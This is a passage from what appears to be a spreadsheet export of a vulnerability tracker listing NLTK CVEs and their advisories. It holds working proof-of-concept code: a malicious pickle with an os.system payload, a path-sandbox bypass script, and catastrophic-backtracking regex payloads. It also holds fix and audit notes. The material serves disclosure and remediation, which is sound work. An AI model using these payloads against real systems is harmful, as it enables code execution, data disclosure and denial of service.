The upfront `validate_network_url()` and the direct-path IP pinning (from the earlier DNS-rebinding fixes, CVE-2026-54296 / GHSA-qvv7) are unchanged — this only closes the proxied downgrade they didn't cover.</t></is></c><c r="T39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t></is></c></row><row r="40"><c r="A40" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B40" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C40" s="5" t="inlineStr"><is><t>CVE-2026-78683</t></is></c><c r="D40" s="5" t="inlineStr" /><c r="E40" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F40" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G40" s="5" t="inlineStr" /><c r="H40" s="5" t="n"><v>0.003</v></c><c r="I40" s="5" t="inlineStr" /><c r="J40" s="5" t="inlineStr" /><c r="K40" s="5" t="inlineStr" /><c r="L40" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M40" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N40" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O40" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P40" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q40" s="5" t="inlineStr" /><c r="R40" s="5" t="inlineStr" /><c r="S40" s="5" t="inlineStr"><is><t>## Summary

The NLTK library's `TransitionParser.parse()` method deserializes model files using `pickle_load()` with the default `restricted=False` parameter, allowing arbitrary Python code execution when loading a malicious model file. The library provides a `RestrictedUnpickler` class for safe deserialization, but it is never used by production code paths, leaving the vulnerability unpatched.

## Root Cause

**File:** `nltk/parse/transitionparser.py` (lines 542-557)

The `parse()` method calls `pickle_load(f)` without `restricted=True`, routing through `WarningUnpickler` which inherits from `pickle.Unpickler` and does NOT override `find_class()`. This allows arbitrary class/function resolution during unpickling, enabling RCE via standard pickle gadgets (e.g., `os.system`, `subprocess.Popen`).

**Vulnerability chain in `nltk/picklesec.py`:**

```python
def pickle_load(file, *, context=None, restricted=False):
    if restricted:
        return RestrictedUnpickler(file).load()  # Safe: blocks all globals
    return WarningUnpickler(file, context=context).load()  # VULNERABLE PATH
```

`WarningUnpickler` only emits a warning but does NOT block unsafe class loading — it calls `super().load()` which is standard `pickle.Unpickler.load()`.

**Why this is not by design:**
- NLTK intentionally created `RestrictedUnpickler` to block unsafe deserialization
- The `restricted=True` parameter exists in the API but is **never used** by any production code path
- All call sites use the default `restricted=False`: `transitionparser.py:557`, `parse/chartparser_app.py:816`, `parse/chartparser_app.py:2273`, `parse/chartparser_app.py:2311`

## Attack Surface

**Entry point:** `TransitionParser().parse(depgraphs, modelFile)` receives a filesystem path with no validation.

**Exploitation path:**
1. Attacker places a malicious pickle file at a known or attacker-controlled location
2. Victim calls `parser.parse(sentences, "/path/to/malicious_model.pkl")`
3. `pickle_load()` deserializes the file with `restricted=False` (default)
4. Standard pickle gadget chain executes arbitrary Python code with victim's privileges

**Impact:** Remote code execution with the privileges of the user running the NLTK-dependent application. Affects researchers, data scientists, and automated ML pipelines using NLTK for parsing tasks.

## Steps to Reproduce

### Environment
- NLTK version: 3.8.1+ (all versions with `transitionparser.py`)
- Python 3.6+
- No special dependencies required

### Reproduction

1. Create a malicious pickle file that uses `__reduce__` to execute a system command during deserialization.

2. Call `TransitionParser().parse([], '/path/to/malicious_model.pkl')`.

3. The `pickle_load(f)` call at `transitionparser.py:557` uses `restricted=False` by default, routing through `WarningUnpickler`, which does not override `find_class()` and permits full class resolution — executing the embedded gadget.

4. Arbitrary code executes with the victim's privileges.

### Proof That the Fix Works

Changing line 557 in `transitionparser.py` from:
```python
model = pickle_load(f)
```
to:
```python
model = pickle_load(f, restricted=True)
```
causes `RestrictedUnpickler` to raise an `UnpicklingError` and block execution, confirming the safe path prevents the attack.

### Working PoC

```python
import pickle
import os
from nltk.parse.transitionparser import TransitionParser

# Create malicious pickle with RCE payload
class Exploit:
    def __reduce__(self):
        return (os.system, ('touch /tmp/nltk_poc_triggered',))

with open('/tmp/malicious_model.pkl', 'wb') as f:
    pickle.dump(Exploit(), f)

# Trigger the vulnerable code path (requires algorithm argument in ≤ 3.9.4)
parser = TransitionParser('arc-standard')      # or 'arc-eager'
parser.parse([], '/tmp/malicious_model.pkl')   # loads and unpickles unsafely

# Exploit succeeds: file /tmp/nltk_poc_triggered is created
```

On NLTK ≥ 3.10.0 (patched), the same code fails with:

```
_pickle.UnpicklingError: global 'posix.system' is not in the pickle allowlist
```

This proves the vulnerability exists in versions ≤ 3.9.4 and is fixed in 3.10.0+.

## Recommended Fix

Change all call sites to use `restricted=True`:

| File | Line | Before | After |
|------|------|--------|-------|
| `nltk/parse/transitionparser.py` | 557 | `pickle_load(f)` | `pickle_load(f, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 816 | `pickle_load(model_data_file)` | `pickle_load(model_data_file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2273 | `pickle_load(file)` | `pickle_load(file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2311 | `pickle_load(fp)` | `pickle_load(fp, restricted=True)` |

**Note:** This fix may affect loading older sklearn models. A more robust approach would implement a module allowlist in `RestrictedUnpickler.find_class()`.</t></is></c><c r="T40" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t></is></c></row><row r="41"><c r="A41" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B41" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C41" s="5" t="inlineStr"><is><t>CVE-2026-79657</t></is></c><c r="D41" s="5" t="inlineStr" /><c r="E41" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F41" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G41" s="5" t="inlineStr" /><c r="H41" s="5" t="n"><v>0.012</v></c><c r="I41" s="5" t="inlineStr" /><c r="J41" s="5" t="inlineStr" /><c r="K41" s="5" t="inlineStr" /><c r="L41" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M41" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N41" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q41" s="5" t="inlineStr" /><c r="R41" s="5" t="inlineStr" /><c r="S41" s="5" t="inlineStr"><is><t>### Summary

The current source tree still allows arbitrary code execution during supposedly safer allowlisted pickle loading. The allowlist trusts whole module namespaces instead of exact safe globals, so crafted pickles can invoke dangerous in-namespace callables through pickle REDUCE.

### Details

- **Vulnerability type:** Remote code execution via unsafe deserialization
- **Affected component:** `nltk.picklesec.allowlisted_pickle_load`, `nltk.tokenize.punkt.punkt_pickle_load`, `nltk.parse.transitionparser.TransitionParser.parse`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was not the claim target for this bypass.
- **Patched versions:** Not yet patched
- **Root cause:** Module-prefix allowlists include dangerous callables such as `nltk.tokenize.repp.ReppTokenizer._execute` and `numpy.f2py.crackfortran.myeval`.

`punkt_pickle_load()` allowlists both `nltk.tokenize.punkt` and the whole `nltk.tokenize` namespace, which exposes `ReppTokenizer._execute()` and its `subprocess.Popen(...)` sink during unpickling. `TransitionParser.parse()` uses `allowlisted_pickle_load(..., allowed_modules=("numpy", "scipy", "sklearn"))`, which permits `numpy.f2py.crackfortran.myeval()` and its attacker-controlled `eval(...)` path. I confirmed both gadgets create marker files before the caller returns or later aborts on type misuse.

### PoC

**Preconditions**
- The application loads an attacker-controlled tokenizer or model artifact through these public loaders.

**Steps**
1. Create a pickle whose REDUCE callable is `ReppTokenizer._execute` and point its command to a harmless marker-file write.
2. Pass that payload to `punkt_pickle_load(BytesIO(payload))` and observe the marker file is created during unpickling.
3. Create a second pickle whose REDUCE callable is `numpy.f2py.crackfortran.myeval` and load it through `TransitionParser.parse()`.
4. Observe the second marker file is created before `TransitionParser.parse()` later fails on the returned object type.

**Minimal reproducible excerpt**

```text
{'punkt_marker': 'PUNKT_RCE', 'transitionparser_marker': 'TP_RCE'}
```

### Impact

Any caller that trusts these current allowlisted loaders can still execute attacker-controlled commands while loading model or tokenizer artifacts. This defeats the protection mechanism that replaced unrestricted pickle loading and creates a dangerous false sense of safety.

### Remediation

Replace broad module-prefix allowlists with exact `(module, qualname)` pairs for the few safe classes or functions genuinely required. Do not allow entire namespaces such as `nltk.tokenize` or `numpy`, and keep post-load type validation only as a secondary defense.

### Resources

- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/punkt.py#L120-L134
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/repp.py#L111-L115
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L26-L30
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L565-L571

---

## Fix + attack demonstration (verified)

 + tightened callers
`find_class` now, before the allowlists:
1. **Rejects any dotted `name`** → closes 4489 with zero legit impact.
2. **Denies dangerous modules** (`os`, `subprocess`, `sys`, `builtins`, `numpy.f2py`, `nltk.tokenize.repp`, …) even under a broad `allowed_modules` — a defense-in-depth **backstop** so a future too-broad allowlist can't silently reopen RCE.
3. **`builtins` denied wholesale**; safe primitives (`int`, `str`, …) must be named exactly via `allowed_globals`.

Callers tightened: punkt drops the broad `nltk.tokenize` (keeps `nltk.tokenize.punkt` + exact `collections.defaultdict`/`builtins.int`); transitionparser keeps numpy/scipy/sklearn (array unpickling needs their submodules) with the new guards blocking the gadgets.

## Full pickle-sink audit
Every deserialization sink in the tree was reviewed: **no raw `pickle.load`** anywhere, and **no** joblib/numpy/torch/dill/yaml/marshal loaders. `data.load` + `wordnet_app` use `RestrictedUnpickler` (blocks all globals — safe); the remaining `pickle_load` sites (`chartparser_app`, `tbl/demo`) load user-selected or self-written files and keep their warning.

## Attack demonstration (captured; fork clone)
```
=== EXPLOITS blocked ===
  4489 sklearn.os.system (dotted)      -&gt; BLOCKED
  x99w numpy.f2py.crackfortran.myeval  -&gt; BLOCKED
  x99w nltk.tokenize.repp._execute     -&gt; BLOCKED
  backstop os.system (os allowlisted)  -&gt; BLOCKED
  backstop builtins.eval (exact global)-&gt; BLOCKED
=== LEGIT loads still work ===
  punkt round-trip via punkt_pickle_load -&gt; OK
  builtins.int (safe primitive)          -&gt; OK
```

## Tests
`test_pickle_allowlist_security.py` — added 5 regressions (dotted traversal, both namespace gadgets, denied-module backstop, legit round-trip). Suite: 122 passed / 9 skipped (sklearn-dependent) across pickle/punkt/transition/tokenize. pre-commit (black/isort/ruff) clean.</t></is></c><c r="T41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t></is></c></row><row r="42"><c r="A42" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B42" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C42" s="5" t="inlineStr"><is><t>CVE-2026-79674</t></is></c><c r="D42" s="5" t="inlineStr" /><c r="E42" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F42" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G42" s="5" t="inlineStr" /><c r="H42" s="5" t="n"><v>0.002</v></c><c r="I42" s="5" t="inlineStr" /><c r="J42" s="5" t="inlineStr" /><c r="K42" s="5" t="inlineStr" /><c r="L42" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M42" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N42" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O42" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P42" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q42" s="5" t="inlineStr" /><c r="R42" s="5" t="inlineStr" /><c r="S42" s="5" t="inlineStr"><is><t>## Summary

NLTK corpus-reader constructors can still reach outside-root file and database reads before the `nltk.pathsec` sandbox boundary is enforced.

The PoC shows the safe path blocked by `pathsec.open`, then `LinThesaurusCorpusReader` and `PanLexLiteCorpusReader` succeeding in the same process.

## Affected Product

- Product: NLTK
- Asset / component: `nltk.corpus.reader` constructors
- Version tested: `3.10.2`
- Deployment / package / tag: commit `474af1f5a94b1b8d53fc2b6defec3a2ce7633b74` / PyPI `nltk`
- Environment used for verification: Python 3.13.14

## Vulnerability Details

- Vulnerability class: path sandbox bypass / external control of file path
- Required privileges: none beyond the ability to supply a corpus root path to a consumer call site
- Entry point: `LinThesaurusCorpusReader(root)` and `PanLexLiteCorpusReader(root)`
- Trust boundary crossed: NLTK data-root sandbox enforced by `nltk.pathsec`
- Root affected functions:
  - [CorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/api.py#L73-L80)
  - [LinThesaurusCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/lin.py#L37-L43)
  - [PanLexLiteCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/panlex_lite.py#L45-L46)
- Measured unsafe effect: outside-root file/database reads still happen with `ENFORCE=True`

## Root Cause

`CorpusReader.__init__()` turns a string root into a `FileSystemPathPointer` without any `pathsec` validation, and these readers then use builtin `open()` or `sqlite3.connect()` directly on derived paths. The constructor path therefore never hits the sandbox guard that `pathsec.open()` enforces.

```python
if zipfile:
    root = ZipFilePathPointer(zipfile, zipentry)
else:
    root = FileSystemPathPointer(root)

with open(path) as lin_file:
    ...

self._c = sqlite3.connect(os.path.join(root, "db.sqlite")).cursor()
```

## Proof of Concept

Save the script as `hy01_raw_path_poc.py` in the checkout root and run `python hy01_raw_path_poc.py`.

```python
#!/usr/bin/env python3
"""PoC for HY-01: corpus-reader sandbox bypass.

This script proves three facts:
- pathsec blocks a direct read through the sandboxed file API
- LinThesaurusCorpusReader still reaches builtin open() on an outside path
- PanLexLiteCorpusReader still opens an outside sqlite database and loads data
"""

from __future__ import annotations

import builtins
import pathlib
import sqlite3
import sys
import tempfile
from unittest.mock import patch

try:
    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader
except ModuleNotFoundError:
    here = pathlib.Path(__file__).resolve()
    for base in (here.parent, *here.parents):
        if (base / "nltk").is_dir() and (base / "setup.py").exists():
            sys.path.insert(0, str(base))
            break
    else:
        raise RuntimeError(
            "Could not import nltk. Run this script from an NLTK checkout root "
            "or from an environment where the current checkout is installed."
        )

    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader


def main() -&gt; int:
    pathsec.ENFORCE = True

    with patch.object(pathsec, "_get_allowed_roots", lambda: set()):
        with patch.object(pathsec.os, "getcwd", lambda: "sandbox-disabled"):
            with tempfile.TemporaryDirectory() as tmp:
                tmpdir = pathlib.Path(tmp)
                outside = tmpdir / "outside"
                outside.mkdir()

                blocked_file = outside / "blocked.txt"
                blocked_file.write_text("blocked", encoding="utf-8")

                control_target = str(blocked_file)
                try:
                    with pathsec.open(control_target, "rb"):
                        raise AssertionError(
                            "pathsec.open unexpectedly allowed control path"
                        )
                except PermissionError:
                    print("control:pathsec.open=blocked")

                lin_root = tmpdir / "lin"
                lin_root.mkdir()
                lin_file = lin_root / "simN.lsp"
                lin_file.write_text(
                    '("business" (desc 1.0)\n\t"enterprise"\t0.9\n))\n',
                    encoding="utf-8",
                )

                opened = []
                real_open = builtins.open

                def tracking_open(*args, **kwargs):
                    opened.append(str(args[0]))
                    return real_open(*args, **kwargs)

                with patch("builtins.open", tracking_open):
                    LinThesaurusCorpusReader(str(lin_root))

                if any(p.endswith("simN.lsp") for p in opened):
                    print("lin:outside_root_open=success")
                else:
                    raise AssertionError("LinThesaurusCorpusReader did not open data")

                panlex_root = tmpdir / "panlex"
                panlex_root.mkdir()
                db_path = panlex_root / "db.sqlite"
                db = sqlite3.connect(db_path)
                cur = db.cursor()
                cur.execute("create table lv(uid text, lv text, lc text, tt text)")
                cur.execute("create table dnx(ex int, mn int, uq int, ap int, ui text)")
                cur.execute("create table ex(ex int, tt text, lv text, uq int)")
                cur.execute(
                    "insert into lv(uid, lv, lc, tt) values ('u1', 'lv1', 'en', 'English')"
                )
                db.commit()
                db.close()

                reader = PanLexLiteCorpusReader(str(panlex_root))
                result = reader.language_varieties()
                if result == [("u1", "English")]:
                    print("panlex:language_varieties=success")
                else:
                    raise AssertionError("PanLexLiteCorpusReader did not load data")

    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Expected output:

```
control:pathsec.open=blocked
lin:outside_root_open=success
panlex:language_varieties=success
```
## Impact

A caller can make NLTK read filesystem content outside the intended NLTK data sandbox through public corpus-reader constructors. In the PoC, that includes a local text file and a local SQLite db.

## Severity

- Base Score: 7.5 (High)
- Severity reasoning:
  The bug is reliably triggerable by caller-controlled path input and exposes data outside the intended trust boundary; no special privileges are needed inside the process.

## Remediation

Validate raw string roots before constructing readers, and route all corpus-root/path handling through `pathsec` or a validated `PathPointer`. Remove direct builtin `open()` and direct `sqlite3.connect(os.path.join(...))` use on constructor-derived paths.</t></is></c><c r="T42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t></is></c></row><row r="43"><c r="A43" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B43" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C43" s="5" t="inlineStr"><is><t>CVE-2026-79676</t></is></c><c r="D43" s="5" t="inlineStr" /><c r="E43" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F43" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G43" s="5" t="inlineStr" /><c r="H43" s="5" t="n"><v>0.003</v></c><c r="I43" s="5" t="inlineStr" /><c r="J43" s="5" t="inlineStr" /><c r="K43" s="5" t="inlineStr" /><c r="L43" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M43" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N43" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O43" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P43" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q43" s="5" t="inlineStr" /><c r="R43" s="5" t="inlineStr" /><c r="S43" s="5" t="inlineStr"><is><t>### Summary

Several corpus readers still step outside NLTK's symlink-aware trusted-root model. They derive in-root paths from trusted corpus state, convert those paths back into plain strings, and reopen them with built-in `open()` rather than `nltk.pathsec.open()`.

### Details

- **Vulnerability type:** Path traversal and symlink boundary bypass
- **Affected component:** `nltk.corpus.reader.ipipan`, `nltk.corpus.reader.crubadan`, `nltk.corpus.reader.lin`
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Root-derived paths are reopened with raw `open()` without preserving the trusted-root boundary.

`IPIPANCorpusReader` opens `header.xml` derived from `morph.xml`, `CrubadanCorpusReader` opens `table.txt` directly, and `LinThesaurusCorpusReader` opens `simN.lsp` paths returned from its own root helpers. Under `pathsec.ENFORCE=True`, a symlink placed inside the trusted corpus root can point outside the root and still be parsed successfully. It was confirmed parsed outside-root content is returned through public methods such as `channels()`, `domains()`, `categories()`, `langs()`, `crubadan_to_iso()`, `synonyms()`, and `scored_synonyms()`.

### PoC

**Preconditions**
- The application processes attacker-influenced corpora inside a trusted NLTK data root or trusted corpus directory.

**Steps**
1. Create a trusted corpus root and keep `pathsec.ENFORCE=True` with that root allowlisted.
2. Place symlinked reader inputs such as `header.xml`, `table.txt`, or `simN.lsp` inside the root and point them to external files.
3. Instantiate the corresponding corpus reader and call its normal public methods.
4. Observe that parsed outside-root values are returned even though `pathsec.open()` blocks the same symlink targets.

**Minimal reproducible excerpt**

```text
{'ipipan': ['LEAK', 'TOPSECRET', 'CLASSIFIED'], 'crubadan': ['LEAK'], 'lin': [('LEAK', 9.5)]}
```

### Impact

An attacker who can stage corpus files or symlinks under a trusted data root can disclose outside-root content through normal corpus-reader results, defeating the boundary NLTK documents for shared and untrusted-input environments.

### Remediation

Preserve `PathPointer` and `required_root` semantics end to end. Replace direct `open()` calls with `nltk.pathsec.open()` or a reader helper that keeps the trusted-root boundary intact.

### References

- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/ipipan.py#L162-L192
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/crubadan.py#L74-L98
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/lin.py#L40-L43
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L521-L545

---

## Fix + full-codebase audit (verified)


I swept every raw file open in the corpus readers, not just the three the umbrella named:

| Reader | Site | Advisory | Root scoping |
|---|---|---|---|
| crubadan | table.txt + `&lt;code&gt;-3grams.txt` | p4rw / j5pw | `required_root=self.root` |
| lin | simN.lsp | p4rw | `required_root=self.root` |
| xmldocs | XMLCorpusView bare-string fileid | 934p (base reader) | global fallback (view has no root) |
| pl196x | textids index | **found by audit** | `required_root=self._root` |
| mte | MTEFileReader | mvf5 | `required_root` threaded through 8 call sites |
| toolbox | StandardFormat.open codecs.open | cr8c | global sandbox (low-level parser) |
| named_entity | load_ace_file ann/text | 7qj2 | global sandbox |
| nkjp | XML_Tool source file | p4rw class | `required_root=self._root` |

`ipipan` already validates via the earlier #3727 fix — unchanged.

## Fix
Each site now calls `nltk.pathsec.validate_path(path, required_root=…)` before opening. Where the reader has a concrete corpus root, the check is **scoped** with `required_root` (rejects any escape outside that root). `XMLCorpusView` carries no root, so it falls back to the global data-root sandbox via `getattr(self, "_root", None)` — which also avoids an AttributeError on the bare-string path.

## Reproduced (captured)
```
raw open(symlink) reads: 'TOPSECRET_OUTSIDE_ROOT'          &lt;- the bypass
validate_path(symlink, required_root): ValueError -&gt; BLOCKS the escape
validate_path(legit in-root): PASSED                       &lt;- loads normally
```

## Honest residual
The global-sandbox fallback (toolbox, named_entity, xmldocs-view) is only as tight as the allowed-roots list, which currently includes the **system temp dir**. Scoping every reader with `required_root` and removing the temp dir from the allowed roots would harden it further (separate advisory / task).

## Tests
`test_corpus_reader_pathsec.py` — symlink escape rejected, in-root file allowed, XMLCorpusView string-fileid no AttributeError, MTEFileReader out-of-root rejected. 46 existing corpus/toolbox tests pass; all edited modules import (no circular import). pre-commit (black/isort/ruff) clean.

---

## Scope caveat
`validate_path` blocks every symlink escape variant (verified) and equals `pathsec.open()`'s guarantee, but does NOT block **hardlinks** (no symlink to resolve; tracked separately as GHSA-f794-5jv7-7672) or the validate-then-open TOCTOU race (shared by `pathsec.open`; needs O_NOFOLLOW/openat).</t></is></c><c r="T43" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t></is></c></row><row r="44"><c r="A44" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B44" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C44" s="5" t="inlineStr"><is><t>CVE-2026-80205</t></is></c><c r="D44" s="5" t="inlineStr" /><c r="E44" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F44" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G44" s="5" t="inlineStr" /><c r="H44" s="5" t="n"><v>0.005</v></c><c r="I44" s="5" t="inlineStr" /><c r="J44" s="5" t="inlineStr" /><c r="K44" s="5" t="inlineStr" /><c r="L44" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M44" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N44" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O44" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P44" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q44" s="5" t="inlineStr" /><c r="R44" s="5" t="inlineStr" /><c r="S44" s="5" t="inlineStr"><is><t>### Summary
NLTK's `Text.findall()` and `TokenSearcher.findall()` methods accept user-supplied regular expressions and pass them to the Python `re` engine without timeout or validation, enabling catastrophic backtracking (ReDoS). This issue is isolated to the `nltk.text` module and was resolved in a prior commit.

### Affected Code
`nltk/text.py` — `TokenSearcher.findall()` (line 255) / `Text.findall()` (line 620)

`TokenSearcher.__init__` builds an internal string by wrapping each token in angle brackets. The `findall()` method preprocesses the caller-supplied regexp and runs it directly against this string with no timeout:

```python
def findall(self, regexp):
    # Preprocessing does NOT prevent catastrophic backtracking
    regexp = re.sub(r"\s", "", regexp)
    regexp = re.sub(r"&lt;", "(?:&lt;(?:", regexp)
    regexp = re.sub(r"&gt;", ")&gt;)", regexp)
    regexp = re.sub(r"(?&lt;!\\)\.", "[^&gt;]", regexp)

    # User-controlled regexp executed with no timeout
    hits = re.findall(regexp, self._raw)
```
The preprocessing transforms `&lt;` and `&gt;` angle-bracket syntax but does not inspect or reject catastrophically backtracking patterns.

### Proof of Concept
```python
import nltk
import time

# Token of 25 'a' characters produces self._raw = "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;"
# The trailing '!' ensures no match, forcing full backtracking.
text = nltk.Text(["a" * 25 + "!"])

# Pattern after transformation:
#   &lt;  →  (?:&lt;(?:
#   &gt;  →  )&gt;)
# Becomes: (?:&lt;(?:((a+)+)b)&gt;)
# re.findall runs this against "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;" — hangs.

start = time.time()
text.findall(r"&lt;((a+)+)b&gt;")   # Never returns
```

### Impact
Applications that expose `Text.findall()` to external input are vulnerable to a denial of service. An unauthenticated attacker can cause indefinite CPU saturation with one request, denying service to all other users of the Python process.

### Remediation
This vulnerability was patched in commit `d8e4753`. Users should update to the patched version.

### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t></is></c><c r="T44" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t></is></c></row><row r="45"><c r="A45" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B45" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C45" s="5" t="inlineStr"><is><t>CVE-2026-80206</t></is></c><c r="D45" s="5" t="inlineStr" /><c r="E45" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F45" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G45" s="5" t="inlineStr" /><c r="H45" s="5" t="n"><v>0.003</v></c><c r="I45" s="5" t="inlineStr" /><c r="J45" s="5" t="inlineStr" /><c r="K45" s="5" t="inlineStr" /><c r="L45" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M45" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N45" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q45" s="5" t="inlineStr" /><c r="R45" s="5" t="inlineStr" /><c r="S45" s="5" t="inlineStr"><is><t>### Summary
The NLTK `tgrep` module accepts user-supplied regular expressions and passes them to the Python `re` engine without a timeout or validation, enabling catastrophic backtracking (ReDoS). Applications that expose the `tgrep` API to external input are vulnerable to a single-request denial of service that blocks the Python process indefinitely.

### Affected Code
`nltk/tgrep.py` — `_tgrep_node_action()` (around line 320)

When a tgrep pattern contains a `/regex/` node, `_tgrep_node_action` compiles the embedded regex literal directly with no validation:

```python
def _tgrep_node_action(_s, _l, tokens):
    ...
    elif tokens[0].startswith("/"):
        assert tokens[0].endswith("/")
        node_lit = tokens[0][1:-1]
        return (
            lambda r: lambda n, m=None, l=None: r.search(
                _tgrep_node_literal_value(n)
            )
        )(re.compile(node_lit))  # User regex compiled and executed with no timeout
```
The compiled regex is applied against every matching tree node label via `r.search(...)`. A caller reaching this path via `tgrep_positions()` or `tgrep_compile()` controls `node_lit` entirely.

### Proof of Concept
```python
import nltk
from nltk.tgrep import tgrep_positions

# Root node label is 25 'a' characters.
# tgrep /regex/ branch calls re.compile("((a+)+)b").search("aaa...a")
# No 'b' is present — exponential backtracking occurs.
tree = nltk.Tree.fromstring("(" + "a" * 25 + " (NP (DT the)))")
tgrep_positions(r"/((a+)+)b/", [tree])   # Never returns
```

### Working Poc

The following script uses increasing values of n (the number of repeated as in the tree root label) to measure the execution time of tgrep_positions with the catastrophic regex /((a+)+)b/. On standard CPython with NLTK 3.10.2, the runtime grows exponentially, confirming the ReDoS vulnerability. For n ≥ 35, the function will hang indefinitely.

```python
import nltk
from nltk.tgrep import tgrep_positions
import time

def test_n(n):
    tree = nltk.Tree.fromstring("(" + "a" * n + " (NP (DT the)))")
    pattern = r"/((a+)+)b/"
    start = time.perf_counter()
    list(tgrep_positions(pattern, [tree]))
    return time.perf_counter() - start

if __name__ == "__main__":
    # Adjust the range if needed – these values complete quickly
    n_values = [18, 20, 22, 24, 26, 28]
    print(f"Testing n = {n_values}\n")

    times = []
    for n in n_values:
        t = test_n(n)
        times.append((n, t))
        print(f"n={n:2d} done", flush=True)

    print("\n--- Increase factors (per step in n) ---")
    factors = []
    for i in range(1, len(times)):
        prev_n, prev_t = times[i-1]
        curr_n, curr_t = times[i]
        factor = curr_t / prev_t
        factors.append((curr_n, factor))
        print(f"n={curr_n:2d} : factor = {factor:.2f}x  (vs n={prev_n})")

    avg = sum(f for _, f in factors) / len(factors)
    print(f"\nAverage factor: {avg:.2f}x")
